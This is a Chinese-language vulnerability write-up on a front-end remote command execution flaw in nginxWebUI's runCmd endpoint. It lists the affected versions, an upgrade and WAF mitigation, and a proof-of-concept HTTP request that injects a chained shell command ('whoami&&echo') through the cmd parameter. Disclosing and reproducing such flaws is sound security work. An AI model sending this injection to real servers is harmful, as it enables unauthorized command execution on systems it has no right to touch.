【漏洞复现】nginxWebUI runCmd前台远程命令执行漏洞

admin 2024年1月12日21:49:08评论53 views字数 1128阅读3分45秒阅读模式

免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

漏洞名称

nginxWebUI runCmd前台远程命令执行漏洞

漏洞详情

nginxWebUI是一款图形化管理nginx配置的工具, 可以使用网页来快速配置nginx的各项功能, 包括http协议转发,tcp协议转发, 反向代理, 负载均衡, 静态html服务器, ssl证书自动申请、续签、配置等, 配置好后可一建生成nginx.conf文件, 同时可控制nginx使用此文件进行启动与重载, 完成对nginx的图形化控制闭环.

nginxWebUI由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。该漏洞利用条件简单,漏洞危害较高。

影响产品

nginxWebUI <= 3.5.0

漏洞复现

1.系统页面:

【漏洞复现】nginxWebUI runCmd前台远程命令执行漏洞

2.poc

GET /AdminPage/conf/runCmd?cmd=whoami%26%26echo%20nginx HTTP/1.1Host: 192.168.18.128:8080Cookie: SOLONID=ab4603d571394000a48398f2383fdc26; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705042515; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705042611User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://192.168.18.128:8080/Upgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate

【漏洞复现】nginxWebUI runCmd前台远程命令执行漏洞

修复建议

补丁文件

暂无

其他修复方法

官方已发布了新版本修复了权限绕过漏洞,并且在一定程度上缓解了远程命令执行的风险。建议用户前往官网更新至最新版本

缓解方案

该漏洞属于命令拼接漏洞,所以可使用WAF进行防护

原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】nginxWebUI runCmd前台远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月12日21:49:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】nginxWebUI runCmd前台远程命令执行漏洞https://cn-sec.com/archives/2386676.html

发表评论

匿名网友 填写信息